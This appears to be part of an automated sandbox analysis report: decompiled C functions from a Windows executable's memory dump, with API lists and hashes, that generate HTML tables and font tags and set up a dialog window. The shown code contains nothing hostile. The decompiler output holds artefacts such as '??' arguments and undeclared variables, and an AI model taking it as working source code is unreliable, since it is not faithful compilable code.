                                                                                                                                                                                                                          • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 304928396-0
                                                                                                                                                                                                                          • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                                                                          • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 69%
                                                                                                                                                                                                                          			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				void _v518;
                                                                                                                                                                                                                          				long _v520;
                                                                                                                                                                                                                          				void _v1030;
                                                                                                                                                                                                                          				char _v1032;
                                                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                                                          				wchar_t* _t57;
                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                          				void* _t60;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t58 = __esi;
                                                                                                                                                                                                                          				_v520 = 0;
                                                                                                                                                                                                                          				memset( &_v518, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1032 = 0;
                                                                                                                                                                                                                          				memset( &_v1030, 0, 0x1fc);
                                                                                                                                                                                                                          				_t60 = _t59 + 0x18;
                                                                                                                                                                                                                          				_v8 = 1;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t57 = _a4;
                                                                                                                                                                                                                          				 *_t57 = 0;
                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                          					wcscpy(_t57, L"<font");
                                                                                                                                                                                                                          					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                                                                                                          					if(_t32 > 0) {
                                                                                                                                                                                                                          						_push(_t32);
                                                                                                                                                                                                                          						_push(L" size=\"%d\"");
                                                                                                                                                                                                                          						_push(0xff);
                                                                                                                                                                                                                          						_push( &_v520);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						wcscat(_t57,  &_v520);
                                                                                                                                                                                                                          						_t60 = _t60 + 0x18;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                                                                                                                                          						_push(E0040ADC0(_t33,  &_v1032));
                                                                                                                                                                                                                          						_push(L" color=\"#%s\"");
                                                                                                                                                                                                                          						_push(0xff);
                                                                                                                                                                                                                          						_push( &_v520);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						wcscat(_t57,  &_v520);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					wcscat(_t57, ">");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                                                                                          					wcscat(_t57, L"<b>");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				wcscat(_t57, _a8);
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                                                                                                                                          					wcscat(_t57, L"</b>");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                          					wcscat(_t57, L"</font>");
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t57;
                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                          • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                                                                          • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                                                          			E00403C03(void* __eflags) {
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                                          				void* _t113;
                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                          				void* _t122;
                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                          				intOrPtr* _t124;
                                                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t113 = _t108;
                                                                                                                                                                                                                          				E00403B3C(_t113);
                                                                                                                                                                                                                          				E00403B16(_t113);
                                                                                                                                                                                                                          				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                                                                                                                                                          				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                                                                                                                                                          				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                                                                                                                                                          				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                                                                                                                                                          				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                                                                                                                                                          				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                                                                                                                                                          				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                                                                                                                          				 *_t124 = 0x3ea;
                                                                                                                                                                                                                          				E0040AD85(GetDlgItem(??, ??));
                                                                                                                                                                                                                          				 *_t124 = 0x3f1;
                                                                                                                                                                                                                          				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                                                                                                                                                          				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                                                                                                                                                          				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                                                                                                                                                          				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                                                                                                                                                          				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                                                                                                                                                          				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                                                                                                                                                          				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                                                                                                                                                          				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                                                                                                                                                          				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                                                                                                                                                          				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                                                                                                                                                          				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                                                                                                                                                          				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                                                                                                                                                          				_t134 = _t124 + 0x78;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                                                                                                                                                          				_t119 = 1;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t17 = _t119 + 0x280; // 0x281
                                                                                                                                                                                                                          					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                                                                                                                                                          					_t134 = _t134 + 0xc;
                                                                                                                                                                                                                          					_t119 = _t119 + 1;
                                                                                                                                                                                                                          				} while (_t119 <= 9);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                                                                                                                                                          				_t121 = 1;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t21 = _t121 + 0x294; // 0x295
                                                                                                                                                                                                                          					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                                                                                                                                                          					_t134 = _t134 + 0xc;
                                                                                                                                                                                                                          					_t121 = _t121 + 1;
                                                                                                                                                                                                                          				} while (_t121 <= 3);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                                                                                                                                                          				_t122 = 0;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                                                                                                                                                          					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                                                                                                                                                          					_t134 = _t134 + 0xc;
                                                                                                                                                                                                                          					_t122 = _t122 + 1;
                                                                                                                                                                                                                          				} while (_t122 <= 0xd);
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                                                                                                                                                          				_t123 = 0;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                                                                                                                                                          					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                                                                                                                                                          					_t134 = _t134 + 0xc;
                                                                                                                                                                                                                          					_t123 = _t123 + 1;
                                                                                                                                                                                                                          					_t143 = _t123 - 3;
                                                                                                                                                                                                                          				} while (_t123 < 3);
                                                                                                                                                                                                                          				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                                                                                                                                                          				E00403EC3(GetDlgItem, _t113);
                                                                                                                                                                                                                          				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                                                                                                                                          				_t88 = E00402D78(_t113, _t143);
                                                                                                                                                                                                                          				E00402BEE(_t113);
                                                                                                                                                                                                                          				return _t88;
                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                                                                                                                            • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                                                                            • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                                                                                                                          • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                                                                                                                          • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                                                                                                                            • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00403C6A
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                                                                                                                          • LoadImageW.USER32 ref: 00403C7F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                                                                                                                            • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                                                                                                                            • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                                                                                                                            • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403D64
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E20
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                                                                                                                          • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1038210931-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 56%
                                                                                                                                                                                                                          			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                          				void _v138;
                                                                                                                                                                                                                          				long _v140;
                                                                                                                                                                                                                          				void _v242;
                                                                                                                                                                                                                          				char _v244;
                                                                                                                                                                                                                          				void _v346;
                                                                                                                                                                                                                          				char _v348;
                                                                                                                                                                                                                          				void _v452;
                                                                                                                                                                                                                          				void _v962;
                                                                                                                                                                                                                          				signed short _v964;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t87;
                                                                                                                                                                                                                          				wchar_t* _t109;
                                                                                                                                                                                                                          				intOrPtr* _t124;
                                                                                                                                                                                                                          				signed int _t125;
                                                                                                                                                                                                                          				signed int _t140;
                                                                                                                                                                                                                          				signed int _t153;
                                                                                                                                                                                                                          				intOrPtr* _t154;
                                                                                                                                                                                                                          				signed int _t156;
                                                                                                                                                                                                                          				signed int _t157;
                                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                                          				void* _t161;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t124 = __ebx;
                                                                                                                                                                                                                          				_v964 = _v964 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v962, 0, 0x1fc);
                                                                                                                                                                                                                          				_t125 = 0x18;
                                                                                                                                                                                                                          				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                                                                                                                                          				asm("movsw");
                                                                                                                                                                                                                          				_t153 = 0;
                                                                                                                                                                                                                          				_v244 = 0;
                                                                                                                                                                                                                          				memset( &_v242, 0, 0x62);
                                                                                                                                                                                                                          				_v348 = 0;
                                                                                                                                                                                                                          				memset( &_v346, 0, 0x62);
                                                                                                                                                                                                                          				_v140 = 0;
                                                                                                                                                                                                                          				memset( &_v138, 0, 0x62);
                                                                                                                                                                                                                          				_t161 = _t159 + 0x3c;
                                                                                                                                                                                                                          				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                                                                                                                                          				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                                                                                                                                                          				if(_t87 != 0xffffffff) {
                                                                                                                                                                                                                          					_push(E0040ADC0(_t87,  &_v964));
                                                                                                                                                                                                                          					_push(L" bgcolor=\"%s\"");
                                                                                                                                                                                                                          					_push(0x32);
                                                                                                                                                                                                                          					_push( &_v244);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t161 = _t161 + 0x18;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                                                                                                                                          				_v8 = _t153;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                          						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                                                                                                                                                          						_v12 = _t156;
                                                                                                                                                                                                                          						_t157 = _t156 * 0x14;
                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                                                                                                                                                          							wcscpy( &_v140, L" nowrap");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v32 = _v32 | 0xffffffff;
                                                                                                                                                                                                                          						_v28 = _v28 | 0xffffffff;
                                                                                                                                                                                                                          						_v24 = _v24 | 0xffffffff;
                                                                                                                                                                                                                          						_v20 = _t153;
                                                                                                                                                                                                                          						_t154 = _a8;
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                                                                                                                                                          						E0040ADC0(_v32,  &_v348);
                                                                                                                                                                                                                          						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                                                                                                                                                          						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                                                                                                                                          							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_push( *(_t157 + _v16 + 0x10));
                                                                                                                                                                                                                          							_push(E0040ADC0(_t106,  &_v964));
                                                                                                                                                                                                                          							_push(L"<font color=\"%s\">%s</font>");
                                                                                                                                                                                                                          							_push(0x2000);
                                                                                                                                                                                                                          							_push( *(_t124 + 0x68));
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_t161 = _t161 + 0x14;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t109 =  *(_t124 + 0x64);
                                                                                                                                                                                                                          						_t140 =  *_t109 & 0x0000ffff;
                                                                                                                                                                                                                          						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                                                                                                                                          							wcscat(_t109, L"&nbsp;");
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                                                                                                                                                          						_push( &_v140);
                                                                                                                                                                                                                          						_push( &_v348);
                                                                                                                                                                                                                          						_push( *(_t124 + 0x68));
                                                                                                                                                                                                                          						_push( &_v244);
                                                                                                                                                                                                                          						_push( &_v452);
                                                                                                                                                                                                                          						_push(0x2000);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t161 = _t161 + 0x28;
                                                                                                                                                                                                                          						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                                          						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t153 = 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L14:
                                                                                                                                                                                                                          				E00407343(_t124, _a4, L"</table><p>");
                                                                                                                                                                                                                          				return E00407343(_t124, _a4, L"\r\n");
                                                                                                                                                                                                                          			}
































                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000007.00000002.696565923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696557626.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696575204.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696581527.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000007.00000002.696588488.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                                          • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                                                                          • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 40%
                                                                                                                                                                                                                          			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				char _v516;
                                                                                                                                                                                                                          				void _v1026;
                                                                                                                                                                                                                          				long _v1028;
                                                                                                                                                                                                                          				void _v1538;
                                                                                                                                                                                                                          				char _v1540;
                                                                                                                                                                                                                          				void _v2050;
                                                                                                                                                                                                                          				char _v2052;
                                                                                                                                                                                                                          				char _v2564;
                                                                                                                                                                                                                          				char _v35332;
                                                                                                                                                                                                                          				char _t51;
                                                                                                                                                                                                                          				intOrPtr* _t54;
                                                                                                                                                                                                                          				void* _t61;
                                                                                                                                                                                                                          				intOrPtr* _t73;
                                                                                                                                                                                                                          				void* _t78;
                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0x8a00, __ecx);
                                                                                                                                                                                                                          				_v2052 = 0;
                                                                                                                                                                                                                          				memset( &_v2050, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1540 = 0;
                                                                                                                                                                                                                          				memset( &_v1538, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1028 = 0;
                                                                                                                                                                                                                          				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                                                                          				_t79 = _t78 + 0x24;
                                                                                                                                                                                                                          				if(_a20 != 0xffffffff) {
                                                                                                                                                                                                                          					_push(E0040ADC0(_a20,  &_v2564));
                                                                                                                                                                                                                          					_push(L" bgcolor=\"%s\"");
                                                                                                                                                                                                                          					_push(0xff);
                                                                                                                                                                                                                          					_push( &_v2052);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					_t79 = _t79 + 0x18;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_a24 != 0xffffffff) {
                                                                                                                                                                                                                          					_push(E0040ADC0(_a24,  &_v2564));
                                                                                                                                                                                                                          					_push(L"<font color=\"%s\">");
                                                                                                                                                                                                                          					_push(0xff);
                                                                                                                                                                                                                          					_push( &_v1540);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					wcscpy( &_v1028, L"</font>");
                                                                                                                                                                                                                          					_t79 = _t79 + 0x20;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push( &_v2052);
                                                                                                                                                                                                                          				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                                                                                                                                          				_push(0x3fff);
                                                                                                                                                                                                                          				_push( &_v35332);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				_t80 = _t79 + 0x10;
                                                                                                                                                                                                                          				E00407343(_a4, _a8,  &_v35332);
                                                                                                                                                                                                                          				_t51 = _a16;
                                                                                                                                                                                                                          				if(_t51 > 0) {
                                                                                                                                                                                                                          					_t73 = _a12 + 4;
                                                                                                                                                                                                                          					_a20 = _t51;
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_v516 = 0;
                                                                                                                                                                                                                          						memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          						_t54 =  *_t73;
                                                                                                                                                                                                                          						_t81 = _t80 + 0xc;
                                                                                                                                                                                                                          						if( *_t54 == 0) {
                                                                                                                                                                                                                          							_v516 = 0;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_push(_t54);
                                                                                                                                                                                                                          							_push(L" width=\"%s\"");
                                                                                                                                                                                                                          							_push(0xff);
                                                                                                                                                                                                                          							_push( &_v516);
                                                                                                                                                                                                                          							L0040B1EC();
                                                                                                                                                                                                                          							_t81 = _t81 + 0x10;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_push( &_v1028);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                                                                                                                                          						_push( &_v1540);
                                                                                                                                                                                                                          						_push( &_v516);
                                                                                                                                                                                                                          						_push(L"<th%s>%s%s%s\r\n");
                                                                                                                                                                                                                          						_push(0x3fff);
                                                                                                                                                                                                                          						_push( &_v35332);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t80 = _t81 + 0x1c;
                                                                                                                                                                                                                          						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                                                                                                                                                          						_t73 = _t73 + 8;
                                                                                                                                                                                                                          						_t36 =  &_a20;
                                                                                                                                                                                                                          						 *_t36 = _a20 - 1;
                                                                                                                                                                                                                          					} while ( *_t36 != 0);
                                                                                                                                                                                                                          					return _t61;
                                                                                                                                                                                                                          				}
